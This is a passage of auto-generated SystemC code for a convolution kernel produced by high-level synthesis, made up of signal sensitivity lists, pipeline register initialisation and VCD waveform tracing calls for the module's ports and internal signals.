exitcond_flatten_reg_2238 ); sensitive << ( tmp_5_fu_717_p2 ); SC_METHOD(thread_tmp_80_fu_1750_p2); sensitive << ( j_cast4_mid2_cast_reg_2585 ); sensitive << ( tmp_79_reg_2954 ); SC_METHOD(thread_tmp_81_fu_1195_p2); sensitive << ( tmp_48_reg_2414 ); SC_METHOD(thread_tmp_83_cast_fu_1791_p1); sensitive << ( tmp_80_reg_3004 ); SC_METHOD(thread_tmp_85_fu_1721_p1); sensitive << ( grp_fu_1407_p2 ); SC_METHOD(thread_tmp_86_fu_1725_p1); sensitive << ( grp_fu_1407_p2 ); SC_METHOD(thread_tmp_87_fu_1761_p2); sensitive << ( tmp_85_reg_2959 ); sensitive << ( p_shl26_cast_fu_1754_p3 ); SC_METHOD(thread_tmp_88_fu_1795_p2); sensitive << ( j_cast4_mid2_cast_reg_2585 ); sensitive << ( tmp_87_reg_3009 ); SC_METHOD(thread_tmp_89_fu_1267_p2); sensitive << ( tmp_48_reg_2414 ); SC_METHOD(thread_tmp_90_cast_fu_1860_p1); sensitive << ( tmp_88_reg_3084 ); SC_METHOD(thread_tmp_93_fu_1766_p1); sensitive << ( grp_fu_1481_p2 ); SC_METHOD(thread_tmp_94_fu_1770_p1); sensitive << ( grp_fu_1481_p2 ); SC_METHOD(thread_tmp_95_fu_1806_p2); sensitive << ( tmp_93_reg_3014 ); sensitive << ( p_shl24_cast_fu_1799_p3 ); SC_METHOD(thread_tmp_96_fu_1864_p2); sensitive << ( j_cast4_mid2_cast_reg_2585 ); sensitive << ( tmp_95_reg_3089 ); SC_METHOD(thread_tmp_97_cast_fu_1901_p1); sensitive << ( tmp_96_reg_3134 ); SC_METHOD(thread_tmp_97_fu_1341_p2); sensitive << ( tmp_48_reg_2414 ); SC_METHOD(thread_tmp_9_cast_fu_611_p1); sensitive << ( tmp_1_fu_605_p2 ); SC_METHOD(thread_tmp_9_cast_mid1_fu_1006_p1); sensitive << ( tmp_31_fu_1001_p2 ); SC_METHOD(thread_tmp_9_fu_974_p2); sensitive << ( row_b_1_reg_2402 ); SC_METHOD(thread_tmp_cast_mid2_cast_fu_1251_p1); sensitive << ( tmp_cast_mid2_reg_2522 ); SC_METHOD(thread_tmp_cast_mid2_fu_1057_p3); sensitive << ( tmp_2_mid2_reg_2328 ); sensitive << ( tmp_cast_mid5_reg_2484 ); sensitive << ( tmp_mid1_reg_2495 ); SC_METHOD(thread_tmp_cast_mid3_fu_962_p3); sensitive << ( exitcond_flatten43_m_reg_2290 ); sensitive << ( j_cast4_mid1_cast_fu_952_p1 ); sensitive << ( tmp_cast_mid_fu_943_p3 ); SC_METHOD(thread_tmp_cast_mid5_fu_989_p3); sensitive << ( exitcond_flatten_mid_2_reg_2299 ); sensitive << ( j_cast5_mid2_cast_fu_949_p1 ); sensitive << ( tmp_cast_mid3_fu_962_p3 ); SC_METHOD(thread_tmp_cast_mid_fu_943_p3); sensitive << ( tmp_s_reg_2224 ); sensitive << ( exitcond_flatten_reg_2238 ); SC_METHOD(thread_tmp_fu_589_p2); sensitive << ( row_b_phi_fu_523_p4 ); SC_METHOD(thread_tmp_mid1_fu_1010_p2); sensitive << ( j_cast5_mid2_cast_fu_949_p1 ); sensitive << ( tmp_9_cast_mid1_fu_1006_p1 ); SC_METHOD(thread_tmp_s_fu_615_p2); sensitive << ( j_cast5_fu_585_p1 ); sensitive << ( tmp_9_cast_fu_611_p1 ); SC_METHOD(thread_to_b_1_fu_926_p2); sensitive << ( to_b_mid2_reg_2369 ); SC_METHOD(thread_to_b_mid2_fu_783_p3); sensitive << ( to_b_reg_555 ); sensitive << ( tmp_30_fu_778_p2 ); SC_METHOD(thread_to_b_phi_fu_559_p4); sensitive << ( to_b_reg_555 ); sensitive << ( ap_reg_pp0_iter1_exitcond_flatten3_reg_2229 ); sensitive << ( ap_CS_fsm_pp0_stage2 ); sensitive << ( to_b_1_reg_2463 ); sensitive << ( ap_enable_reg_pp0_iter1 ); sensitive << ( ap_block_pp0_stage2_flag00000000 ); SC_METHOD(thread_ap_NS_fsm); sensitive << ( ap_start ); sensitive << ( ap_CS_fsm ); sensitive << ( ap_CS_fsm_state1 ); sensitive << ( ap_CS_fsm_pp0_stage6 ); sensitive << ( ap_enable_reg_pp0_iter15 ); sensitive << ( exitcond_flatten3_fu_621_p2 ); sensitive << ( ap_enable_reg_pp0_iter0 ); sensitive << ( ap_enable_reg_pp0_iter1 ); sensitive << ( ap_enable_reg_pp0_iter14 ); sensitive << ( ap_block_pp0_stage0_flag00011011 ); sensitive << ( ap_block_pp0_stage15_flag00011011 ); sensitive << ( ap_block_pp0_stage6_flag00011011 ); sensitive << ( ap_block_pp0_stage1_flag00011011 ); sensitive << ( ap_block_pp0_stage2_flag00011011 ); sensitive << ( ap_block_pp0_stage3_flag00011011 ); sensitive << ( ap_block_pp0_stage4_flag00011011 ); sensitive << ( ap_block_pp0_stage5_flag00011011 ); sensitive << ( ap_block_pp0_stage7_flag00011011 ); sensitive << ( ap_block_pp0_stage8_flag00011011 ); sensitive << ( ap_block_pp0_stage9_flag00011011 ); sensitive << ( ap_block_pp0_stage10_flag00011011 ); sensitive << ( ap_block_pp0_stage11_flag00011011 ); sensitive << ( ap_block_pp0_stage12_flag00011011 ); sensitive << ( ap_block_pp0_stage13_flag00011011 ); sensitive << ( ap_block_pp0_stage14_flag00011011 ); SC_THREAD(thread_hdltv_gen); sensitive << ( ap_clk.pos() ); SC_THREAD(thread_ap_var_for_const0); ap_CS_fsm = "000000000000000001"; ap_enable_reg_pp0_iter7 = SC_LOGIC_0; ap_enable_reg_pp0_iter15 = SC_LOGIC_0; ap_enable_reg_pp0_iter0 = SC_LOGIC_0; ap_enable_reg_pp0_iter1 = SC_LOGIC_0; ap_enable_reg_pp0_iter2 = SC_LOGIC_0; ap_enable_reg_pp0_iter3 = SC_LOGIC_0; ap_enable_reg_pp0_iter4 = SC_LOGIC_0; ap_enable_reg_pp0_iter5 = SC_LOGIC_0; ap_enable_reg_pp0_iter6 = SC_LOGIC_0; ap_enable_reg_pp0_iter8 = SC_LOGIC_0; ap_enable_reg_pp0_iter9 = SC_LOGIC_0; ap_enable_reg_pp0_iter10 = SC_LOGIC_0; ap_enable_reg_pp0_iter11 = SC_LOGIC_0; ap_enable_reg_pp0_iter12 = SC_LOGIC_0; ap_enable_reg_pp0_iter13 = SC_LOGIC_0; ap_enable_reg_pp0_iter14 = SC_LOGIC_0; static int apTFileNum = 0; stringstream apTFilenSS; apTFilenSS << "convolve_kernel_sc_trace_" << apTFileNum ++; string apTFn = apTFilenSS.str(); mVcdFile = sc_create_vcd_trace_file(apTFn.c_str()); mVcdFile->set_time_unit(1, SC_PS); if (1) { #ifdef __HLS_TRACE_LEVEL_PORT__ sc_trace(mVcdFile, ap_clk, "(port)ap_clk"); sc_trace(mVcdFile, ap_rst_n, "(port)ap_rst_n"); sc_trace(mVcdFile, bufw_Addr_A, "(port)bufw_Addr_A"); sc_trace(mVcdFile, bufw_EN_A, "(port)bufw_EN_A"); sc_trace(mVcdFile, bufw_WEN_A, "(port)bufw_WEN_A"); sc_trace(mVcdFile, bufw_Din_A, "(port)bufw_Din_A"); sc_trace(mVcdFile, bufw_Dout_A, "(port)bufw_Dout_A"); sc_trace(mVcdFile, bufw_Clk_A, "(port)bufw_Clk_A"); sc_trace(mVcdFile, bufw_Rst_A, "(port)bufw_Rst_A"); sc_trace(mVcdFile, bufi_Addr_A, "(port)bufi_Addr_A"); sc_trace(mVcdFile, bufi_EN_A, "(port)bufi_EN_A"); sc_trace(mVcdFile, bufi_WEN_A, "(port)bufi_WEN_A"); sc_trace(mVcdFile, bufi_Din_A, "(port)bufi_Din_A"); sc_trace(mVcdFile, bufi_Dout_A, "(port)bufi_Dout_A"); sc_trace(mVcdFile, bufi_Clk_A, "(port)bufi_Clk_A"); sc_trace(mVcdFile, bufi_Rst_A, "(port)bufi_Rst_A"); sc_trace(mVcdFile, bufo_Addr_A, "(port)bufo_Addr_A"); sc_trace(mVcdFile, bufo_EN_A, "(port)bufo_EN_A"); sc_trace(mVcdFile, bufo_WEN_A, "(port)bufo_WEN_A"); sc_trace(mVcdFile, bufo_Din_A, "(port)bufo_Din_A"); sc_trace(mVcdFile, bufo_Dout_A, "(port)bufo_Dout_A"); sc_trace(mVcdFile, bufo_Clk_A, "(port)bufo_Clk_A"); sc_trace(mVcdFile, bufo_Rst_A, "(port)bufo_Rst_A"); sc_trace(mVcdFile, s_axi_control_AWVALID, "(port)s_axi_control_AWVALID"); sc_trace(mVcdFile, s_axi_control_AWREADY, "(port)s_axi_control_AWREADY"); sc_trace(mVcdFile, s_axi_control_AWADDR, "(port)s_axi_control_AWADDR"); sc_trace(mVcdFile, s_axi_control_WVALID, "(port)s_axi_control_WVALID"); sc_trace(mVcdFile, s_axi_control_WREADY, "(port)s_axi_control_WREADY"); sc_trace(mVcdFile, s_axi_control_WDATA, "(port)s_axi_control_WDATA"); sc_trace(mVcdFile, s_axi_control_WSTRB, "(port)s_axi_control_WSTRB"); sc_trace(mVcdFile, s_axi_control_ARVALID, "(port)s_axi_control_ARVALID"); sc_trace(mVcdFile, s_axi_control_ARREADY, "(port)s_axi_control_ARREADY"); sc_trace(mVcdFile, s_axi_control_ARADDR, "(port)s_axi_control_ARADDR"); sc_trace(mVcdFile, s_axi_control_RVALID, "(port)s_axi_control_RVALID"); sc_trace(mVcdFile, s_axi_control_RREADY, "(port)s_axi_control_RREADY"); sc_trace(mVcdFile, s_axi_control_RDATA, "(port)s_axi_control_RDATA"); sc_trace(mVcdFile, s_axi_control_RRESP, "(port)s_axi_control_RRESP"); sc_trace(mVcdFile, s_axi_control_BVALID, "(port)s_axi_control_BVALID"); sc_trace(mVcdFile, s_axi_control_BREADY, "(port)s_axi_control_BREADY"); sc_trace(mVcdFile, s_axi_control_BRESP, "(port)s_axi_control_BRESP"); sc_trace(mVcdFile, interrupt, "(port)interrupt"); #endif #ifdef __HLS_TRACE_LEVEL_INT__ sc_trace(mVcdFile, ap_rst_n_inv, "ap_rst_n_inv"); sc_trace(mVcdFile, ap_start, "ap_start"); sc_trace(mVcdFile, ap_done, "ap_done"); sc_trace(mVcdFile, ap_idle, "ap_idle"); sc_trace(mVcdFile, ap_CS_fsm, "ap_CS_fsm"); sc_trace(mVcdFile, ap_CS_fsm_state1, "ap_CS_fsm_state1"); sc_trace(mVcdFile, ap_ready, "ap_ready"); sc_trace(mVcdFile, indvar_flatten1_reg_461, "indvar_flatten1_reg_461"); sc_trace(mVcdFile, i_reg_472, "i_reg_472"); sc_trace(mVcdFile, indvar_flatten2_reg_484, "indvar_flatten2_reg_484"); sc_trace(mVcdFile, j_reg_495, "j_reg_495"); sc_trace(mVcdFile, indvar_flatten3_reg_507, "indvar_flatten3_reg_507"); sc_trace(mVcdFile, row_b_reg_519, "row_b_reg_519"); sc_trace(mVcdFile, indvar_flatten_reg_531, "indvar_flatten_reg_531"); sc_trace(mVcdFile, col_b_reg_543, "col_b_reg_543"); sc_trace(mVcdFile, to_b_reg_555, "to_b_reg_555"); sc_trace(mVcdFile, grp_fu_567_p2, "grp_fu_567_p2"); sc_trace(mVcdFile, reg_575, "reg_575"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage6, "ap_CS_fsm_pp0_stage6"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter7, "ap_enable_reg_pp0_iter7"); sc_trace(mVcdFile, ap_block_state8_pp0_stage6_iter0, "ap_block_state8_pp0_stage6_iter0"); sc_trace(mVcdFile, ap_block_state24_pp0_stage6_iter1, "ap_block_state24_pp0_stage6_iter1"); sc_trace(mVcdFile, ap_block_state40_pp0_stage6_iter2, "ap_block_state40_pp0_stage6_iter2"); sc_trace(mVcdFile, ap_block_state56_pp0_stage6_iter3, "ap_block_state56_pp0_stage6_iter3"); sc_trace(mVcdFile, ap_block_state72_pp0_stage6_iter4, "ap_block_state72_pp0_stage6_iter4"); sc_trace(mVcdFile, ap_block_state88_pp0_stage6_iter5, "ap_block_state88_pp0_stage6_iter5"); sc_trace(mVcdFile, ap_block_state104_pp0_stage6_iter6, "ap_block_state104_pp0_stage6_iter6"); sc_trace(mVcdFile, ap_block_state120_pp0_stage6_iter7, "ap_block_state120_pp0_stage6_iter7"); sc_trace(mVcdFile, ap_block_state136_pp0_stage6_iter8, "ap_block_state136_pp0_stage6_iter8"); sc_trace(mVcdFile, ap_block_state152_pp0_stage6_iter9, "ap_block_state152_pp0_stage6_iter9"); sc_trace(mVcdFile, ap_block_state168_pp0_stage6_iter10, "ap_block_state168_pp0_stage6_iter10"); sc_trace(mVcdFile, ap_block_state184_pp0_stage6_iter11, "ap_block_state184_pp0_stage6_iter11"); sc_trace(mVcdFile, ap_block_state200_pp0_stage6_iter12, "ap_block_state200_pp0_stage6_iter12"); sc_trace(mVcdFile, ap_block_state216_pp0_stage6_iter13, "ap_block_state216_pp0_stage6_iter13"); sc_trace(mVcdFile, ap_block_state232_pp0_stage6_iter14, "ap_block_state232_pp0_stage6_iter14"); sc_trace(mVcdFile, ap_block_state248_pp0_stage6_iter15, "ap_block_state248_pp0_stage6_iter15"); sc_trace(mVcdFile, ap_block_pp0_stage6_flag00011001, "ap_block_pp0_stage6_flag00011001"); sc_trace(mVcdFile, exitcond_flatten3_reg_2229, "exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter7_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter7_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage5, "ap_CS_fsm_pp0_stage5"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter15, "ap_enable_reg_pp0_iter15"); sc_trace(mVcdFile, ap_block_state7_pp0_stage5_iter0, "ap_block_state7_pp0_stage5_iter0"); sc_trace(mVcdFile, ap_block_state23_pp0_stage5_iter1, "ap_block_state23_pp0_stage5_iter1"); sc_trace(mVcdFile, ap_block_state39_pp0_stage5_iter2, "ap_block_state39_pp0_stage5_iter2"); sc_trace(mVcdFile, ap_block_state55_pp0_stage5_iter3, "ap_block_state55_pp0_stage5_iter3"); sc_trace(mVcdFile, ap_block_state71_pp0_stage5_iter4, "ap_block_state71_pp0_stage5_iter4"); sc_trace(mVcdFile, ap_block_state87_pp0_stage5_iter5, "ap_block_state87_pp0_stage5_iter5"); sc_trace(mVcdFile, ap_block_state103_pp0_stage5_iter6, "ap_block_state103_pp0_stage5_iter6"); sc_trace(mVcdFile, ap_block_state119_pp0_stage5_iter7, "ap_block_state119_pp0_stage5_iter7"); sc_trace(mVcdFile, ap_block_state135_pp0_stage5_iter8, "ap_block_state135_pp0_stage5_iter8"); sc_trace(mVcdFile, ap_block_state151_pp0_stage5_iter9, "ap_block_state151_pp0_stage5_iter9"); sc_trace(mVcdFile, ap_block_state167_pp0_stage5_iter10, "ap_block_state167_pp0_stage5_iter10"); sc_trace(mVcdFile, ap_block_state183_pp0_stage5_iter11, "ap_block_state183_pp0_stage5_iter11"); sc_trace(mVcdFile, ap_block_state199_pp0_stage5_iter12, "ap_block_state199_pp0_stage5_iter12"); sc_trace(mVcdFile, ap_block_state215_pp0_stage5_iter13, "ap_block_state215_pp0_stage5_iter13"); sc_trace(mVcdFile, ap_block_state231_pp0_stage5_iter14, "ap_block_state231_pp0_stage5_iter14"); sc_trace(mVcdFile, ap_block_state247_pp0_stage5_iter15, "ap_block_state247_pp0_stage5_iter15"); sc_trace(mVcdFile, ap_block_pp0_stage5_flag00011001, "ap_block_pp0_stage5_flag00011001"); sc_trace(mVcdFile, ap_reg_pp0_iter15_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter15_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, tmp_6_fu_599_p2, "tmp_6_fu_599_p2"); sc_trace(mVcdFile, tmp_6_reg_2219, "tmp_6_reg_2219"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage0, "ap_CS_fsm_pp0_stage0"); sc_trace(mVcdFile, ap_block_state2_pp0_stage0_iter0, "ap_block_state2_pp0_stage0_iter0"); sc_trace(mVcdFile, ap_block_state18_pp0_stage0_iter1, "ap_block_state18_pp0_stage0_iter1"); sc_trace(mVcdFile, ap_block_state34_pp0_stage0_iter2, "ap_block_state34_pp0_stage0_iter2"); sc_trace(mVcdFile, ap_block_state50_pp0_stage0_iter3, "ap_block_state50_pp0_stage0_iter3"); sc_trace(mVcdFile, ap_block_state66_pp0_stage0_iter4, "ap_block_state66_pp0_stage0_iter4"); sc_trace(mVcdFile, ap_block_state82_pp0_stage0_iter5, "ap_block_state82_pp0_stage0_iter5"); sc_trace(mVcdFile, ap_block_state98_pp0_stage0_iter6, "ap_block_state98_pp0_stage0_iter6"); sc_trace(mVcdFile, ap_block_state114_pp0_stage0_iter7, "ap_block_state114_pp0_stage0_iter7"); sc_trace(mVcdFile, ap_block_state130_pp0_stage0_iter8, "ap_block_state130_pp0_stage0_iter8"); sc_trace(mVcdFile, ap_block_state146_pp0_stage0_iter9, "ap_block_state146_pp0_stage0_iter9"); sc_trace(mVcdFile, ap_block_state162_pp0_stage0_iter10, "ap_block_state162_pp0_stage0_iter10"); sc_trace(mVcdFile, ap_block_state178_pp0_stage0_iter11, "ap_block_state178_pp0_stage0_iter11"); sc_trace(mVcdFile, ap_block_state194_pp0_stage0_iter12, "ap_block_state194_pp0_stage0_iter12"); sc_trace(mVcdFile, ap_block_state210_pp0_stage0_iter13, "ap_block_state210_pp0_stage0_iter13"); sc_trace(mVcdFile, ap_block_state226_pp0_stage0_iter14, "ap_block_state226_pp0_stage0_iter14"); sc_trace(mVcdFile, ap_block_state242_pp0_stage0_iter15, "ap_block_state242_pp0_stage0_iter15"); sc_trace(mVcdFile, ap_block_pp0_stage0_flag00011001, "ap_block_pp0_stage0_flag00011001"); sc_trace(mVcdFile, tmp_s_fu_615_p2, "tmp_s_fu_615_p2"); sc_trace(mVcdFile, tmp_s_reg_2224, "tmp_s_reg_2224"); sc_trace(mVcdFile, exitcond_flatten3_fu_621_p2, "exitcond_flatten3_fu_621_p2"); sc_trace(mVcdFile, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter1_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter2_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter2_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter3_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter3_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter4_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter4_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter5_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter5_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter6_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter6_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter8_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter8_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter9_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter9_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter10_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter10_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter11_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter11_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter12_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter12_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter13_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter13_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, ap_reg_pp0_iter14_exitcond_flatten3_reg_2229, "ap_reg_pp0_iter14_exitcond_flatten3_reg_2229"); sc_trace(mVcdFile, indvar_flatten_next3_fu_627_p2, "indvar_flatten_next3_fu_627_p2"); sc_trace(mVcdFile, indvar_flatten_next3_reg_2233, "indvar_flatten_next3_reg_2233"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter0, "ap_enable_reg_pp0_iter0"); sc_trace(mVcdFile, exitcond_flatten_fu_633_p2, "exitcond_flatten_fu_633_p2"); sc_trace(mVcdFile, exitcond_flatten_reg_2238, "exitcond_flatten_reg_2238"); sc_trace(mVcdFile, exitcond_flatten2_fu_639_p2, "exitcond_flatten2_fu_639_p2"); sc_trace(mVcdFile, exitcond_flatten2_reg_2251, "exitcond_flatten2_reg_2251"); sc_trace(mVcdFile, indvar_flatten81_op_fu_645_p2, "indvar_flatten81_op_fu_645_p2"); sc_trace(mVcdFile, indvar_flatten81_op_reg_2257, "indvar_flatten81_op_reg_2257"); sc_trace(mVcdFile, not_exitcond_flatten_fu_651_p2, "not_exitcond_flatten_fu_651_p2"); sc_trace(mVcdFile, not_exitcond_flatten_reg_2262, "not_exitcond_flatten_reg_2262"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage1, "ap_CS_fsm_pp0_stage1"); sc_trace(mVcdFile, ap_block_state3_pp0_stage1_iter0, "ap_block_state3_pp0_stage1_iter0"); sc_trace(mVcdFile, ap_block_state19_pp0_stage1_iter1, "ap_block_state19_pp0_stage1_iter1"); sc_trace(mVcdFile, ap_block_state35_pp0_stage1_iter2, "ap_block_state35_pp0_stage1_iter2"); sc_trace(mVcdFile, ap_block_state51_pp0_stage1_iter3, "ap_block_state51_pp0_stage1_iter3"); sc_trace(mVcdFile, ap_block_state67_pp0_stage1_iter4, "ap_block_state67_pp0_stage1_iter4"); sc_trace(mVcdFile, ap_block_state83_pp0_stage1_iter5, "ap_block_state83_pp0_stage1_iter5"); sc_trace(mVcdFile, ap_block_state99_pp0_stage1_iter6, "ap_block_state99_pp0_stage1_iter6"); sc_trace(mVcdFile, ap_block_state115_pp0_stage1_iter7, "ap_block_state115_pp0_stage1_iter7"); sc_trace(mVcdFile, ap_block_state131_pp0_stage1_iter8, "ap_block_state131_pp0_stage1_iter8"); sc_trace(mVcdFile, ap_block_state147_pp0_stage1_iter9, "ap_block_state147_pp0_stage1_iter9"); sc_trace(mVcdFile, ap_block_state163_pp0_stage1_iter10, "ap_block_state163_pp0_stage1_iter10"); sc_trace(mVcdFile, ap_block_state179_pp0_stage1_iter11, "ap_block_state179_pp0_stage1_iter11"); sc_trace(mVcdFile, ap_block_state195_pp0_stage1_iter12, "ap_block_state195_pp0_stage1_iter12"); sc_trace(mVcdFile, ap_block_state211_pp0_stage1_iter13, "ap_block_state211_pp0_stage1_iter13"); sc_trace(mVcdFile, ap_block_state227_pp0_stage1_iter14, "ap_block_state227_pp0_stage1_iter14"); sc_trace(mVcdFile, ap_block_state243_pp0_stage1_iter15, "ap_block_state243_pp0_stage1_iter15"); sc_trace(mVcdFile, ap_block_pp0_stage1_flag00011001, "ap_block_pp0_stage1_flag00011001"); sc_trace(mVcdFile, exitcond_flatten1_fu_656_p2, "exitcond_flatten1_fu_656_p2"); sc_trace(mVcdFile, exitcond_flatten1_reg_2269, "exitcond_flatten1_reg_2269"); sc_trace(mVcdFile, not_exitcond_flatten_1_fu_667_p2, "not_exitcond_flatten_1_fu_667_p2"); sc_trace(mVcdFile, not_exitcond_flatten_1_reg_2274, "not_exitcond_flatten_1_reg_2274"); sc_trace(mVcdFile, indvar_flatten_next2_fu_672_p3, "indvar_flatten_next2_fu_672_p3"); sc_trace(mVcdFile, indvar_flatten_next2_reg_2280, "indvar_flatten_next2_reg_2280"); sc_trace(mVcdFile, tmp_2_fu_678_p2, "tmp_2_fu_678_p2"); sc_trace(mVcdFile, tmp_2_reg_2285, "tmp_2_reg_2285"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage2, "ap_CS_fsm_pp0_stage2"); sc_trace(mVcdFile, ap_block_state4_pp0_stage2_iter0, "ap_block_state4_pp0_stage2_iter0"); sc_trace(mVcdFile, ap_block_state20_pp0_stage2_iter1, "ap_block_state20_pp0_stage2_iter1"); sc_trace(mVcdFile, ap_block_state36_pp0_stage2_iter2, "ap_block_state36_pp0_stage2_iter2"); sc_trace(mVcdFile, ap_block_state52_pp0_stage2_iter3, "ap_block_state52_pp0_stage2_iter3"); sc_trace(mVcdFile, ap_block_state68_pp0_stage2_iter4, "ap_block_state68_pp0_stage2_iter4"); sc_trace(mVcdFile, ap_block_state84_pp0_stage2_iter5, "ap_block_state84_pp0_stage2_iter5"); sc_trace(mVcdFile, ap_block_state100_pp0_stage2_iter6, "ap_block_state100_pp0_stage2_iter6"); sc_trace(mVcdFile, ap_block_state116_pp0_stage2_iter7, "ap_block_state116_pp0_stage2_iter7"); sc_trace(mVcdFile, ap_block_state132_pp0_stage2_iter8, "ap_block_state132_pp0_stage2_iter8"); sc_trace(mVcdFile, ap_block_state148_pp0_stage2_iter9, "ap_block_state148_pp0_stage2_iter9"); sc_trace(mVcdFile, ap_block_state164_pp0_stage2_iter10, "ap_block_state164_pp0_stage2_iter10"); sc_trace(mVcdFile, ap_block_state180_pp0_stage2_iter11, "ap_block_state180_pp0_stage2_iter11"); sc_trace(mVcdFile, ap_block_state196_pp0_stage2_iter12, "ap_block_state196_pp0_stage2_iter12"); sc_trace(mVcdFile, ap_block_state212_pp0_stage2_iter13, "ap_block_state212_pp0_stage2_iter13"); sc_trace(mVcdFile, ap_block_state228_pp0_stage2_iter14, "ap_block_state228_pp0_stage2_iter14"); sc_trace(mVcdFile, ap_block_state244_pp0_stage2_iter15, "ap_block_state244_pp0_stage2_iter15"); sc_trace(mVcdFile, ap_block_pp0_stage2_flag00011001, "ap_block_pp0_stage2_flag00011001"); sc_trace(mVcdFile, exitcond_flatten43_m_fu_688_p2, "exitcond_flatten43_m_fu_688_p2"); sc_trace(mVcdFile, exitcond_flatten43_m_reg_2290, "exitcond_flatten43_m_reg_2290"); sc_trace(mVcdFile, exitcond_flatten_mid_2_fu_692_p2, "exitcond_flatten_mid_2_fu_692_p2"); sc_trace(mVcdFile, exitcond_flatten_mid_2_reg_2299, "exitcond_flatten_mid_2_reg_2299"); sc_trace(mVcdFile, j_mid_fu_697_p3, "j_mid_fu_697_p3"); sc_trace(mVcdFile, j_mid_reg_2309, "j_mid_reg_2309"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage3, "ap_CS_fsm_pp0_stage3"); sc_trace(mVcdFile, ap_block_state5_pp0_stage3_iter0, "ap_block_state5_pp0_stage3_iter0"); sc_trace(mVcdFile, ap_block_state21_pp0_stage3_iter1, "ap_block_state21_pp0_stage3_iter1"); sc_trace(mVcdFile, ap_block_state37_pp0_stage3_iter2, "ap_block_state37_pp0_stage3_iter2"); sc_trace(mVcdFile, ap_block_state53_pp0_stage3_iter3, "ap_block_state53_pp0_stage3_iter3"); sc_trace(mVcdFile, ap_block_state69_pp0_stage3_iter4, "ap_block_state69_pp0_stage3_iter4"); sc_trace(mVcdFile, ap_block_state85_pp0_stage3_iter5, "ap_block_state85_pp0_stage3_iter5"); sc_trace(mVcdFile, ap_block_state101_pp0_stage3_iter6, "ap_block_state101_pp0_stage3_iter6"); sc_trace(mVcdFile, ap_block_state117_pp0_stage3_iter7, "ap_block_state117_pp0_stage3_iter7"); sc_trace(mVcdFile, ap_block_state133_pp0_stage3_iter8, "ap_block_state133_pp0_stage3_iter8"); sc_trace(mVcdFile, ap_block_state149_pp0_stage3_iter9, "ap_block_state149_pp0_stage3_iter9"); sc_trace(mVcdFile, ap_block_state165_pp0_stage3_iter10, "ap_block_state165_pp0_stage3_iter10"); sc_trace(mVcdFile, ap_block_state181_pp0_stage3_iter11, "ap_block_state181_pp0_stage3_iter11"); sc_trace(mVcdFile, ap_block_state197_pp0_stage3_iter12, "ap_block_state197_pp0_stage3_iter12"); sc_trace(mVcdFile, ap_block_state213_pp0_stage3_iter13, "ap_block_state213_pp0_stage3_iter13"); sc_trace(mVcdFile, ap_block_state229_pp0_stage3_iter14, "ap_block_state229_pp0_stage3_iter14"); sc_trace(mVcdFile, ap_block_state245_pp0_stage3_iter15, "ap_block_state245_pp0_stage3_iter15"); sc_trace(mVcdFile, ap_block_pp0_stage3_flag00011001, "ap_block_pp0_stage3_flag00011001"); sc_trace(mVcdFile, tmp_3_fu_708_p2, "tmp_3_fu_708_p2"); sc_trace(mVcdFile, tmp_3_reg_2315, "tmp_3_reg_2315"); sc_trace(mVcdFile, tmp_7_fu_721_p2, "tmp_7_fu_721_p2"); sc_trace(mVcdFile, tmp_7_reg_2322, "tmp_7_reg_2322"); sc_trace(mVcdFile, tmp_2_mid2_fu_731_p2, "tmp_2_mid2_fu_731_p2"); sc_trace(mVcdFile, tmp_2_mid2_reg_2328, "tmp_2_mid2_reg_2328"); sc_trace(mVcdFile, indvar_flatten_op_fu_737_p2, "indvar_flatten_op_fu_737_p2"); sc_trace(mVcdFile, indvar_flatten_op_reg_2335, "indvar_flatten_op_reg_2335"); sc_trace(mVcdFile, indvar_flatten41_op_fu_743_p2, "indvar_flatten41_op_fu_743_p2"); sc_trace(mVcdFile, indvar_flatten41_op_reg_2340, "indvar_flatten41_op_reg_2340"); sc_trace(mVcdFile, i_1_fu_749_p2, "i_1_fu_749_p2"); sc_trace(mVcdFile, i_1_reg_2345, "i_1_reg_2345"); sc_trace(mVcdFile, ap_CS_fsm_pp0_stage4, "ap_CS_fsm_pp0_stage4"); sc_trace(mVcdFile, ap_block_state6_pp0_stage4_iter0, "ap_block_state6_pp0_stage4_iter0"); sc_trace(mVcdFile, ap_block_state22_pp0_stage4_iter1, "ap_block_state22_pp0_stage4_iter1"); sc_trace(mVcdFile, 